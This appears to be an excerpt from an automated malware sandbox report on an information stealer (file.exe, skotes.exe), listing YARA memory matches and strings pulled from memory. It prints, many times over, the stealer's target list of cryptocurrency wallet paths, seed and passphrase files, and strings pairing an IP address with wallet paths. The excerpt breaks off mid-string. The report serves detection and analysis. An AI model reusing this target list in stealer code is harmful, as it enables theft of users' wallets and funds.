                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE78390 NSS_GetVersion,2_2_6CE78390

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 31.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.DocumentsGDHDHJEBGH.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000003.2020656873.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1895865210.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1906378602.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.1865340368.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.1936159845.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2522125493.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.1907167232.0000000000861000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.1819555911.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1306919815.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1825004684.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16ontdesk\AppData\Roaming\Electrum-LTC\wallets\*.*
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\exodus.conf.json
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\exodus.conf.json
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 16.113Users\user\AppData\Roaming\Exodus\exodus.conf.json
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16ontdesk\AppData\Roaming\Binance\.finger-print.fp
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 